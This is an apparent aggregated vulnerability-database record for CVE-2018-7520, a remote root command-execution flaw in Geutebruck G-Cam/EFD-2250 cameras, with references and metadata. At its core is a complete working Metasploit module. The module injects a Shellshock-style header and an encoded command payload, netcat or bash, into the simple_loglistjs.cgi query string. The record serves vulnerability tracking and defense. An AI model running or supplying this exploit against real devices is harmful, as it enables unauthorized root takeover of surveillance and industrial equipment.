ID

VAR-E-201807-0141


CVE

cve_id:CVE-2018-7520

Trust: 0.5

sources: PACKETSTORM: 148380

EDB ID

44957


TITLE

Geutebruck 5.02024 G-Cam/EFD-2250 - 'simple_loglistjs.cgi' Remote Command Execution (Metasploit) - Hardware webapps Exploit

Trust: 0.6

sources: EXPLOIT-DB: 44957

DESCRIPTION

Geutebruck 5.02024 G-Cam/EFD-2250 - 'simple_loglistjs.cgi' Remote Command Execution (Metasploit).. webapps exploit for Hardware platform

Trust: 0.6

sources: EXPLOIT-DB: 44957

AFFECTED PRODUCTS

vendor:geutebruckmodel:g-cam/efd-2250scope:eqversion:5.02024

Trust: 2.2

vendor:geutebruckmodel:simple loglistjs.cgi remotescope: - version: -

Trust: 0.5

sources: PACKETSTORM: 148380 // EXPLOIT-DB: 44957 // EDBNET: 98505 // EDBNET: 98500

EXPLOIT

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::HttpClient

def initialize(info = {})
super(update_info(info,
'Name' => 'Geutebruck simple_loglistjs.cgi Remote Command Execution',
'Description' => %q{
This module exploits a an arbitrary command execution vulnerability. The
vulnerability exists in the /uapi-cgi/viewer/simple_loglistjs.cgi page and allows an
anonymous user to execute arbitrary commands with root privileges.
Firmware <= 1.12.0.19 are concerned.
Tested on 5.02024 G-Cam/EFD-2250 running 1.12.0.4 firmware.
},
'Author' =>
[
'Nicolas Mattiocco', #CVE-2018-7520 (RCE)
'Davy Douhine' #CVE-2018-7520 (RCE) and metasploit module
],
'License' => MSF_LICENSE,
'References' =>
[
[ 'CVE', '2018-7520' ],
[ 'URL', 'http://geutebruck.com' ],
[ 'URL', 'https://ics-cert.us-cert.gov/advisories/ICSA-18-079-01' ]
],
'Privileged' => false,
'Payload' =>
{
'DisableNops' => true,
'Space' => 1024,
'Compat' =>
{
'PayloadType' => 'cmd',
'RequiredCmd' => 'generic netcat bash',
}
},
'Platform' => 'unix',
'Arch' => ARCH_CMD,
'Targets' => [[ 'Automatic', { }]],
'DefaultTarget' => 0,
'DisclosureDate' => 'Mar 20 2018'))

register_options(
[
OptString.new('TARGETURI', [true, 'The base path to webapp', '/uapi-cgi/viewer/simple_loglistjs.cgi']),
], self.class)
end

def exploit
header = "(){ :;}; "
encpayload = "#{header}#{payload.encoded}"
uri = target_uri.path + "?" + Rex::Text.uri_encode(encpayload, "hex-all")
print_status("#{rhost}:#{rport} - Attempting to exploit...")
res = send_request_raw(
{
'method' => 'GET',
'uri' => uri
})
end

end

Trust: 1.0

sources: EXPLOIT-DB: 44957

EXPLOIT LANGUAGE

rb

Trust: 0.6

sources: EXPLOIT-DB: 44957

PRICE

free

Trust: 0.6

sources: EXPLOIT-DB: 44957

TYPE

'simple_loglistjs.cgi' Remote Command Execution (Metasploit)

Trust: 1.6

sources: EXPLOIT-DB: 44957 // EDBNET: 98505

TAGS

tag:Metasploit Framework (MSF)

Trust: 1.0

tag:exploit

Trust: 0.5

tag:arbitrary

Trust: 0.5

tag:cgi

Trust: 0.5

tag:root

Trust: 0.5

sources: PACKETSTORM: 148380 // EXPLOIT-DB: 44957

CREDITS

RandoriSec

Trust: 0.6

sources: EXPLOIT-DB: 44957

EXTERNAL IDS

db:ICS CERTid:ICSA-18-079-01

Trust: 2.7

db:EXPLOIT-DBid:44957

Trust: 1.6

db:EDBNETid:98505

Trust: 0.6

db:0DAYTODAYid:30660

Trust: 0.6

db:EDBNETid:98500

Trust: 0.6

db:NVDid:CVE-2018-7520

Trust: 0.5

db:PACKETSTORMid:148380

Trust: 0.5

sources: PACKETSTORM: 148380 // EXPLOIT-DB: 44957 // EDBNET: 98505 // EDBNET: 98500

REFERENCES

url:https://www.exploit-db.com/exploits/44957/

Trust: 0.6

url:https://0day.today/exploits/30660

Trust: 0.6

url:https://nvd.nist.gov/vuln/detail/cve-2018-7520

Trust: 0.5

sources: PACKETSTORM: 148380 // EDBNET: 98505 // EDBNET: 98500

SOURCES

db:PACKETSTORMid:148380
db:EXPLOIT-DBid:44957
db:EDBNETid:98505
db:EDBNETid:98500

LAST UPDATE DATE

2022-07-27T09:49:15.722000+00:00


SOURCES RELEASE DATE

db:PACKETSTORMid:148380date:2018-07-02T16:16:13
db:EXPLOIT-DBid:44957date:2018-07-02T00:00:00
db:EDBNETid:98505date:2018-07-03T00:00:00
db:EDBNETid:98500date:2018-07-03T00:00:00